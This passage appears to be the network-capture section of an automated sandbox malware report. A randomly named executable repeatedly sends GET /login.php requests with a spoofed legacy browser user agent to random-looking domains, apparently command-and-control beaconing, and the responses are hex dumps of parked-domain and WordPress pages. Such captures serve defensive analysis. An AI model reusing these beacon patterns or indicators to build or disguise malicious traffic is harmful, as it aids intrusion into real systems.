2024-11-11 17:13:40 UTC	1369	IN	Data Raw: 7c 7b 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e Data Ascii: \|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/min
2024-11-11 17:13:40 UTC	1369	IN	Data Raw: 72 20 2e 73 69 74 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d Data Ascii: r .site-description{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem
2024-11-11 17:13:40 UTC	1369	IN	Data Raw: 6e 67 65 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e Data Ascii: nge]::-webkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .n
2024-11-11 17:13:40 UTC	1369	IN	Data Raw: 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e Data Ascii: y-content .uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .
2024-11-11 17:13:40 UTC	1369	IN	Data Raw: 2d 76 69 73 69 62 6c 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 61 2e 72 65 6d 6f 76 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 2d 73 74 79 6c 65 3a 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 6f 75 74 6c 69 6e 65 2d 77 69 64 74 68 3a 74 68 69 6e 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 Data Ascii: -visible,.woocommerce-js .woocommerce-mini-cart-item a.remove:focus-visible{outline-style:dotted;outline-color:inherit;outline-width:thin;border-color:transparent;}input:focus,input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,inpu
2024-11-11 17:13:40 UTC	1369	IN	Data Raw: 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 45 64 69 74 41 63 63 6f 75 6e 74 46 6f 72 6d 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 66 6f 72 6d 2d 72 6f 77 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 49 6e 70 75 74 2e 69 6e 70 75 74 2d 74 65 78 74 3a 66 6f 63 75 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 61 73 74 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 69 6e 61 74 69 6f 6e 20 75 6c 2e 70 61 67 65 2d 6e 75 6d 62 65 72 73 20 6c 69 20 61 3a 66 6f 63 75 73 2c 62 6f 64 79 20 23 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 66 6f 72 6d 20 2e 66 6f 72 6d 2d 72 6f 77 20 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 64 65 66 61 75 6c 74 Data Ascii: content .woocommerce-EditAccountForm .woocommerce-form-row .woocommerce-Input.input-text:focus,.woocommerce .ast-woocommerce-container .woocommerce-pagination ul.page-numbers li a:focus,body #content .woocommerce form .form-row .select2-container--default

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	63490	75.2.71.199	443	1656	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 17:13:39 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Connection: Keep-Alive
2024-11-11 17:13:39 UTC	353	IN	HTTP/1.1 200 OK Alt-Svc: h3=":443"; ma=2592000 Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate Content-Type: text/html; charset=utf-8 Date: Mon, 11 Nov 2024 17:13:39 GMT Etag: "184vi1aymat19wv" Server: Caddy Server: awselb/2.0 Vary: Accept-Encoding X-Powered-By: Next.js Connection: close Transfer-Encoding: chunked
2024-11-11 17:13:39 UTC	2372	IN	Data Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 70 75 62 6c 69 63 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><link rel="apple-touch-icon" sizes="180x180" href="https://d15wejze7d2tlj.cloudfront.net/v1/public/apple-touch-icon.png"/><link rel="icon" type="image/png" sizes="32x32" href="https://d1
2024-11-11 17:13:39 UTC	1724	IN	Data Raw: 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 31 35 35 61 35 35 36 2d 37 32 37 37 64 32 30 35 62 33 61 39 36 64 64 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 37 37 39 62 62 35 65 2d 65 33 34 61 63 36 66 32 62 33 32 65 65 39 62 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f Data Ascii: ext/static/chunks/b155a556-7277d205b3a96dd1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/chunks/b779bb5e-e34ac6f2b32ee9b1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/
2024-11-11 17:13:39 UTC	4744	IN	Data Raw: 78 2d 63 6f 6c 20 67 61 70 2d 32 20 6d 62 2d 36 22 3e 3c 68 32 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 78 6c 20 66 6f 6e 74 2d 62 6f 6c 64 20 73 6d 3a 74 65 78 74 2d 32 78 6c 22 3e 49 6e 71 75 69 72 65 20 74 6f 64 61 79 20 74 6f 20 73 65 63 75 72 65 20 74 68 69 73 20 64 6f 6d 61 69 6e 3c 2f 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 73 6d 20 66 6f 6e 74 2d 6e 6f 72 6d 61 6c 20 73 6d 3a 74 65 78 74 2d 62 61 73 65 22 3e 50 6c 65 61 73 65 20 63 6f 6d 70 6c 65 74 65 20 74 68 65 20 66 6f 72 6d 20 62 65 6c 6f 77 20 61 6e 64 20 77 65 20 77 69 6c 6c 20 63 6f 6e 6e 65 63 74 20 79 6f 75 20 77 69 74 68 20 6f 6e 65 20 6f 66 20 6f 75 72 20 64 6f 6d 61 69 6e 20 65 78 70 65 72 74 73 2e Data Ascii: x-col gap-2 mb-6"><h2 class="font-Inter text-xl font-bold sm:text-2xl">Inquire today to secure this domain</h2><span class="font-Inter text-sm font-normal sm:text-base">Please complete the form below and we will connect you with one of our domain experts.
2024-11-11 17:13:39 UTC	5930	IN	Data Raw: 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 44 45 22 3e 44 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 34 39 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 50 45 22 3e 50 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 31 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 4d 58 22 3e 4d 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 32 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 55 22 3e 43 55 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 33 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e Data Ascii: -- -->)</option><option value="DE">DE... --> (+... -->49... -->)</option><option value="PE">PE... --> (+... -->51... -->)</option><option value="MX">MX... --> (+... -->52... -->)</option><option value="CU">CU... --> (+... -->53... -->)</option
2024-11-11 17:13:39 UTC	7116	IN	Data Raw: 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 36 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 59 22 3e 43 59 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 37 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 41 58 22 3e 41 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 46 49 22 3e 46 49 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 42 47 22 3e 42 47 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 Data Ascii: --> (+... -->356... -->)</option><option value="CY">CY... --> (+... -->357... -->)</option><option value="AX">AX... --> (+... -->358... -->)</option><option value="FI">FI... --> (+... -->358... -->)</option><option value="BG">BG... --> (+...
2024-11-11 17:13:39 UTC	8302	IN	Data Raw: 69 63 65 2d 72 65 71 75 65 73 74 2d 66 6f 72 6d 2d 69 64 22 20 74 69 74 6c 65 3d 22 47 65 74 20 70 72 69 63 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 65 6e 64 49 63 6f 6e 3d 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 31 2e 35 20 6d 78 2d 61 75 74 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 32 22 3e 47 65 74 20 70 72 69 63 65 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 Data Ascii: ice-request-form-id" title="Get price" aria-label="Get price" label="Get price" endIcon="[object Object]"><span class="flex justify-center items-center gap-1.5 mx-auto"><div class="flex items-center gap-2">Get price<svg xmlns="http://www.w3.org/2000/svg"
2024-11-11 17:13:39 UTC	2586	IN	Data Raw: 30 2e 33 76 2e 30 36 37 68 2d 2e 31 33 36 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 56 2e 37 36 48 39 2e 39 36 76 2e 30 36 38 68 2d 2e 31 33 36 76 2e 30 36 37 68 2d 2e 30 36 38 76 2e 30 36 38 48 39 2e 36 39 76 2e 30 36 38 48 39 2e 36 32 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 31 33 35 76 2e 30 36 37 48 39 2e 33 35 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 39 2e 30 38 76 2e 30 36 38 48 39 2e 30 31 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 76 2e 30 36 37 48 38 2e 37 34 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 38 Data Ascii: 0.3v.067h-.136v.068h-.068v.068h-.067V.76H9.96v.068h-.136v.067h-.068v.068H9.69v.068H9.62v.068h-.068v.068h-.135v.067H9.35v.068h-.068v.068h-.068v.068h-.068v.067H9.08v.068H9.01v.068h-.068v.068h-.068v.068h-.067v.067H8.74v.068h-.068v.068h-.068v.068h-.068v.067H8
2024-11-11 17:13:39 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-11-11 17:13:39 UTC	4096	IN	Data Raw: 36 38 38 31 0d 0a 65 6e 74 43 6f 6c 6f 72 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 39 2e 36 37 20 34 2e 34 37 34 68 2d 33 2e 39 34 36 76 31 31 2e 32 38 37 68 33 2e 39 34 35 63 33 2e 36 30 36 20 30 20 35 2e 39 35 2d 32 2e 32 31 35 20 35 2e 39 35 2d 35 2e 36 32 37 20 30 2d 33 2e 34 32 39 2d 32 2e 33 34 34 2d 35 2e 36 36 2d 35 2e 39 35 2d 35 2e 36 36 6d 2d 31 2e 36 38 33 20 39 2e 33 36 32 56 36 2e 33 38 32 68 31 2e 36 30 31 63 32 2e 33 37 38 20 30 20 33 2e 37 32 20 31 2e 34 30 37 20 33 2e 37 32 20 33 2e 37 35 32 73 2d 31 2e 33 34 32 20 33 2e 37 30 32 2d 33 2e 37 32 20 33 2e 37 30 32 7a 6d 31 37 2e 39 38 32 2d 32 2e 35 35 34 63 30 2d 32 2e 38 33 2d 32 2e 30 32 32 2d 34 2e 36 32 35 2d 34 2e 36 30 39 2d 34 2e 36 32 35 73 Data Ascii: 6881entColor" fill-rule="evenodd" d="M29.67 4.474h-3.946v11.287h3.945c3.606 0 5.95-2.215 5.95-5.627 0-3.429-2.344-5.66-5.95-5.66m-1.683 9.362V6.382h1.601c2.378 0 3.72 1.407 3.72 3.752s-1.342 3.702-3.72 3.702zm17.982-2.554c0-2.83-2.022-4.625-4.609-4.625s
2024-11-11 17:13:39 UTC	13046	IN	Data Raw: 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 35 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 31 33 35 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 31 33 35 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 37 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 38 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 31 33 36 Data Ascii: 068h-.068v-.068h-.135v-.068h-.136v-.068h-.136v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.068v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.136v-.135h-.067v-.068h-.068v-.068h-.068v-.135h-.068v-.068h-.068v-.068h-.067v-.136h-.068v-.067h-.068v-.136h-.068v-.136

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	59137	75.2.71.199	443	4180	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 17:13:45 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Connection: Keep-Alive
2024-11-11 17:13:46 UTC	352	IN	HTTP/1.1 200 OK Alt-Svc: h3=":443"; ma=2592000 Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate Content-Type: text/html; charset=utf-8 Date: Mon, 11 Nov 2024 17:13:46 GMT Etag: "7y6qithl0b19wv" Server: Caddy Server: awselb/2.0 Vary: Accept-Encoding X-Powered-By: Next.js Connection: close Transfer-Encoding: chunked
2024-11-11 17:13:46 UTC	2372	IN	Data Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 70 75 62 6c 69 63 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><link rel="apple-touch-icon" sizes="180x180" href="https://d15wejze7d2tlj.cloudfront.net/v1/public/apple-touch-icon.png"/><link rel="icon" type="image/png" sizes="32x32" href="https://d1
2024-11-11 17:13:46 UTC	1724	IN	Data Raw: 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 31 35 35 61 35 35 36 2d 37 32 37 37 64 32 30 35 62 33 61 39 36 64 64 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 37 37 39 62 62 35 65 2d 65 33 34 61 63 36 66 32 62 33 32 65 65 39 62 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f Data Ascii: ext/static/chunks/b155a556-7277d205b3a96dd1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/chunks/b779bb5e-e34ac6f2b32ee9b1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/
2024-11-11 17:13:46 UTC	4744	IN	Data Raw: 78 2d 63 6f 6c 20 67 61 70 2d 32 20 6d 62 2d 36 22 3e 3c 68 32 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 78 6c 20 66 6f 6e 74 2d 62 6f 6c 64 20 73 6d 3a 74 65 78 74 2d 32 78 6c 22 3e 49 6e 71 75 69 72 65 20 74 6f 64 61 79 20 74 6f 20 73 65 63 75 72 65 20 74 68 69 73 20 64 6f 6d 61 69 6e 3c 2f 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 73 6d 20 66 6f 6e 74 2d 6e 6f 72 6d 61 6c 20 73 6d 3a 74 65 78 74 2d 62 61 73 65 22 3e 50 6c 65 61 73 65 20 63 6f 6d 70 6c 65 74 65 20 74 68 65 20 66 6f 72 6d 20 62 65 6c 6f 77 20 61 6e 64 20 77 65 20 77 69 6c 6c 20 63 6f 6e 6e 65 63 74 20 79 6f 75 20 77 69 74 68 20 6f 6e 65 20 6f 66 20 6f 75 72 20 64 6f 6d 61 69 6e 20 65 78 70 65 72 74 73 2e Data Ascii: x-col gap-2 mb-6"><h2 class="font-Inter text-xl font-bold sm:text-2xl">Inquire today to secure this domain</h2><span class="font-Inter text-sm font-normal sm:text-base">Please complete the form below and we will connect you with one of our domain experts.
